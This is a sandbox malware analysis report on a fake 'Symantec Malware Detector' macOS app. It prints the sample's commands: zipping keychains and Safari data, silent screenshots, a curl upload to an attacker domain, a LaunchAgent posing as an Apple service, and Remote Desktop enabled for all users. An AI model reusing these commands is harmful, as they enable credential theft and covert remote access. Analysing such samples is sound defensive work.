
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 46001
Start time: 13:08:42
Joe Sandbox Product: Cloud
Start date: 21.11.2017
Overall analysis duration: 0h 14m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: BiyuYDBAMc (renamed file extension from none to app)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.macAPP@0/50@15/0
Warnings:
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.


Detection

Strategy     Score   Range      Reporting        Detection
Threshold    100     0 - 100    Report FP / FN   malicious


Classification

Signature Overview

Cryptography:

Creates files with functionality related to DES encryption and/or decryption
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Found S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Found S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Executes the "openssl" command used for cryptographic operations
  Source: /bin/sh (PID: 507); Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Writes files containing public keys to disk
  Source: /usr/bin/unzip (PID: 502); File created 'PUBLIC KEY' pattern: /private/tmp/xpc.app/Contents/MacOS/xpc
  Source: /bin/sh (PID: 506); File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
  Source: /bin/cp (PID: 541); File created 'PUBLIC KEY' pattern: /Library/.random/xpcd.app/Contents/MacOS/xpc

Networking:

Performs DNS lookups
  Source: unknown; DNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) sockets
  Source: /sbin/route (PID: 479); Reads from socket in process: data
  Source: /usr/bin/curl (PID: 513); Reads from socket in process: data
  Source: /usr/bin/curl (PID: 516); Reads from socket in process: data
Uses HTTPS
  Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49203
  Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49202
  Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49201
  Source: unknown; Network traffic detected: HTTP traffic on port 49202 -> 443
  Source: unknown; Network traffic detected: HTTP traffic on port 49201 -> 443
  Source: unknown; Network traffic detected: HTTP traffic on port 49203 -> 443
Writes from file descriptors related to (network) sockets
  Source: /sbin/route (PID: 479); Writes from socket in process: data
  Source: /usr/bin/curl (PID: 513); Writes from socket in process: data
  Source: /usr/bin/curl (PID: 516); Writes from socket in process: data
May scan ports using the "nc" (netcat) command
  Source: /bin/sh (PID: 510); Netcat executable (-z switch): /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Detected non-DNS traffic on DNS port
  Source: global traffic; TCP traffic: 192.168.0.50:49200 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listeners
  Source: /bin/sh (PID: 510); Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Pings several hosts (probably to check C&C connectivity)
  Source: Ping host arguments; More than 5 different servers pinged: abrahamlincolnisaliveandrunssymantec.com, symeher.co, symantecheurengine.com, kio2349329490jfdkf394.com, symheureng.com, klsadkla93242lokiloki.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Captures screenshots with shell command 'screencapture'
  Source: /bin/sh (PID: 493); Screen captured: screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Enables system access through Apple's Remote Desktop Sharing for all users
  Source: /usr/bin/sudo (PID: 551); Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Explicitly creates screenshots silently (i.e. without playing sounds)
  Source: /bin/sh (PID: 493); Screencapture executable (-x switch): screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Uses kickstart to modify Apple's Remote Desktop settings
  Source: /usr/bin/sudo (PID: 551); Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

System Summary:

Classification label
  Source: classification engine; Classification label: mal100.troj.spyw.expl.evad.macAPP@0/50@15/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
  Source: initial sample; Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
  Source: initial sample; Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
  Source: initial sample; Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
  Source: initial sample; Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
  Source: initial sample; Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

App bundle is code signed
  Source: Submitted file: BiyuYDBAMc.app; CodeResources XML file: CodeResources
  Source: Submitted file: BiyuYDBAMc.app; CodeResources XML file: CodeResources
Creates application bundles containing icon files
  Source: /usr/bin/unzip (PID: 502); Icon file created: /tmp/xpc.app/Contents/Resources/Finder.icns
  Source: /bin/cp (PID: 541); Icon file created: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "awk" command used to scan for patterns (usually in standard output)
  Source: /bin/sh (PID: 480); Awk executable: /usr/bin/awk -> awk /gateway/ { print $2 }
Reads data from the local random generator
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Random device file read: /dev/random
  Source: /usr/bin/zip (PID: 485); Random device file read: /dev/random
  Source: /usr/bin/zip (PID: 487); Random device file read: /dev/random
  Source: /usr/sbin/screencapture (PID: 493); Random device file read: /dev/random
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Random device file read: /dev/random
  Source: /usr/bin/openssl (PID: 507); Random device file read: /dev/urandom
  Source: /usr/bin/curl (PID: 513); Random device file read: /dev/random
  Source: /usr/bin/curl (PID: 513); Random device file read: /dev/random
  Source: /usr/bin/curl (PID: 516); Random device file read: /dev/random
  Source: /usr/bin/curl (PID: 516); Random device file read: /dev/random
  Source: /usr/bin/perl5.18 (PID: 551); Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layouts
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
  Source: /usr/bin/xattr (PID: 503); Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
  Source: /usr/bin/unzip (PID: 502); XML plist file created: /private/tmp/xpc.app/Contents/Info.plist
  Source: /usr/bin/unzip (PID: 502); Binary plist file created: /private/tmp/xpc.app/Contents/Resources/MainMenu.nib
  Source: /bin/cp (PID: 541); XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
  Source: /bin/cp (PID: 541); Binary plist file created: /Library/.random/xpcd.app/Contents/Resources/MainMenu.nib
  Source: /bin/sh (PID: 544); XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
  Source: /bin/sh (PID: 546); XML plist file created: /Library/LaunchAgents/com.apple.xpcd.plist
Changes permissions of written Mach-O files
  Source: /usr/bin/unzip (PID: 502); Permissions modified for written 64-bit Mach-O /private/tmp/xpc.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
  Source: /bin/cp (PID: 541); Permissions modified for written 64-bit Mach-O /Library/.random/xpcd.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Checks the current date and time via Internet using a shell command
  Source: /bin/sh (PID: 513); HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Creates Python files with suspicious function names
  Source: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py; Suspicious function name: def xorstr(a, b):
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Suspicious function name: def encrypt(self, data, pad=''):
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Suspicious function name: def decrypt(self, data, pad=''):
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Suspicious function name: def xorstr(self, x, y):
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Suspicious function name: def encrypt(self, data, pad=''):
  Source: /private/tmp/xpc.app/Contents/Resources/pyDes.py; Suspicious function name: def decrypt(self, data, pad=''):
  Source: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py; Suspicious function name: def xorstr(a, b):
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Suspicious function name: def encrypt(self, data, pad=''):
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Suspicious function name: def decrypt(self, data, pad=''):
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Suspicious function name: def xorstr(self, x, y):
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Suspicious function name: def encrypt(self, data, pad=''):
  Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.py; Suspicious function name: def decrypt(self, data, pad=''):
Creates application bundles
  Source: /usr/bin/unzip (PID: 502); Bundle Info.plist file created: /tmp/xpc.app/Contents/Info.plist
  Source: /bin/cp (PID: 541); Bundle Info.plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Creates hidden files, links and/or directories
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Hidden file created: /tmp/.dio3we/.dat.nosync01dc.lbqoPC
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Hidden file moved: /tmp/.dio3we/.dat.nosync01dc.lbqoPC -> /tmp/.dio3we/.lmx
  Source: /bin/mkdir (PID: 481); Hidden Directory created: /tmp/.dio3we -> /tmp/.dio3we
  Source: /usr/sbin/screencapture (PID: 493); Hidden file created: /tmp/.dio3we/..prelim.png-GB5W
  Source: /usr/sbin/screencapture (PID: 493); Hidden file moved: /tmp/.dio3we/..prelim.png-GB5W -> /tmp/.dio3we/.prelim.png
  Source: /bin/sh (PID: 500); Hidden file created: /tmp/.sklerfde
  Source: /usr/bin/unzip (PID: 502); Hidden file created: /tmp/xpc.app/Contents/Resources/.checksum
  Source: /usr/bin/unzip (PID: 502); Hidden file created: /tmp/xpc.app/Contents/Resources/.crc32
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Hidden file created: /Library/.cachedir/.dat.nosync01f9.oWo2Oy
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Hidden file moved: /Library/.cachedir/.dat.nosync01f9.oWo2Oy -> /Library/.cachedir/.lmx
  Source: /bin/mkdir (PID: 538); Hidden Directory created: /Library/.cachedir -> /Library/.cachedir
  Source: /bin/mkdir (PID: 538); Hidden Directory created: /Library/.random -> /Library/.random
  Source: /bin/cp (PID: 541); Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.checksum
  Source: /bin/cp (PID: 541); Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.crc32
Executes commands using a shell command-line interpreter
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c mkdir /tmp/.dio3we
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/backup_(null).zip /tmp/.dio3we && echo success
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c find /tmp/.dio3we -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c screencapture -x /tmp/.dio3we/.prelim.png
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c csrutil status
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c sudo -k
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c echo '' | sudo -S echo success
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c echo 'vreni<0delim0>' > /tmp/.sklerfde
  Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476); Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec\ Malware\ Detector.app/Contents/Resources/sym03_2901.dat && xattr -c /tmp/xpc.app open /tmp/xpc.app
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7a+wrCidA8Z50sv1ExI0FQFqWATGGNKhY2X4TrHEcp0VrTpNbaL8uYo05LiHpowtPZ4Ej0kTtUbGMt7weQ6dVgtALtkcpMfZqC4ii89sb/PX0tIWnJkj2fPpDbMvj4m6dCim7VSO7rXJm81EO6I+cYXFrDNVdKUNO8doZjP2Fw7y/jJLdowusSb8YAnHNsi2KQ0tlZ0pFQmJWgSQ0QWMtCW1UE6tTK21kxP1u7OP6lKAQsYDO1tWyQw4L/X3YK/3Sy7ZBNE8tCWPKDtd1mxJxwcPJt5bcCjFxhqMXznBGHLdNDJHPq1t0ZBQyrRBUK5VbfcbnoruiMpph6FNaqZ7wIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 symantecheurengine.com 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 symheureng.com 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 symeher.co 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 kio2349329490jfdkf394.com 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 klsadkla93242lokiloki.com 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c ping -c 1 abrahamlincolnisaliveandrunssymantec.com 2>/dev/null >/dev/null && echo 0
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c if [ -f /Library/.cachedir/.ptrun ] then echo success fi
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c cat /tmp/.sklerfde
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c rm -rf /tmp/.sklerfde
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c killall Console killall Wireshark rm -rf grace_period echo '' | sudo -S mkdir -p /Library/.cachedir /Library/.random && sudo chmod -R 777 /Library/.cachedir /Library/.random && cp -R /tmp/xpc.app /Library/.random/xpcd.app && mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd && sudo sh -c 'echo '<?xml version=\'1.0\' encoding=\'UTF-8\'?><!DOCTYPE plist PUBLIC \'-//Apple//DTD PLIST 1.0//EN\' \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'><plist version=\'1.0\'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</strin
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c csrutil status
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c python /tmp/xpc.app/Contents/Resources/cb.py -f /Users/vreni/Library/Keychains/login.keychain -p 2>/dev/null > /tmp/.kcd && echo 'success'
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/backup_(null).zip /Library/.cachedir && echo success
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c find /Library/.cachedir -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c screencapture -x /Library/.cachedir/.prelim.png
  Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505); Shell command executed: /bin/sh -c a1511269823=`curl -s -F full_name='vreni' -F admin='1' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Library/.cachedir/backup_(null).zip' -F xml='@/Library/.cachedir/.lmx' -F username='vreni' -F screen='@/Library/.cachedir/.prelim.png' -F ssh_present='0' -F serial-F api_key=57432354a89c4bab15b1c7795507e44d74d21d9500c9d5307a3d71a7949f608b -F cts=1511269823 -F signature=13ba26234ba13dbd86138b9214f0edc304bf9926a7298a58aceeb48bf0270332 https://symantecheurengine.com/api/init` echo $a1511269823
  Source: /usr/bin/sudo (PID: 544); Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>
  Source: /usr/bin/sudo (PID: 546); Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
  Source: /usr/bin/perl5.18 (PID: 553); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users
  Source: /usr/bin/perl5.18 (PID: 554); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid
  Source: /usr/bin/perl5.18 (PID: 555); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid
  Source: /usr/bin/perl5.18 (PID: 556); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid
  Source: /usr/bin/perl5.18 (PID: 557); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid
  Source: /usr/bin/perl5.18 (PID: 558); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid
  Source: /usr/bin/perl5.18 (PID: 559); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid
  Source: /usr/bin/perl5.18 (PID: 560); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid
  Source: /usr/bin/perl5.18 (PID: 561); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid
  Source: /usr/bin/perl5.18 (PID: 562); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid
  Source: /usr/bin/perl5.18 (PID: 563); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid
  Source: /usr/bin/perl5.18 (PID: 564); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid
  Source: /usr/bin/perl5.18 (PID: 565); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid
  Source: /usr/bin/perl5.18 (PID: 566); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid
  Source: /usr/bin/perl5.18 (PID: 567); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid
  Source: /usr/bin/perl5.18 (PID: 568); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid
  Source: /usr/bin/perl5.18 (PID: 569); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid
  Source: /usr/bin/perl5.18 (PID: 570); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid
  Source: /usr/bin/perl5.18 (PID: 571); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid
  Source: /usr/bin/perl5.18 (PID: 572); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid
  Source: /usr/bin/perl5.18 (PID: 573); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid
  Source: /usr/bin/perl5.18 (PID: 574); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid
  Source: /usr/bin/perl5.18 (PID: 575); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid
  Source: /usr/bin/perl5.18 (PID: 576); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid
  Source: /usr/bin/perl5.18 (PID: 577); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid
  Source: /usr/bin/perl5.18 (PID: 578); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid
  Source: /usr/bin/perl5.18 (PID: 579); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid
  Source: /usr/bin/perl5.18 (PID: 580); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid
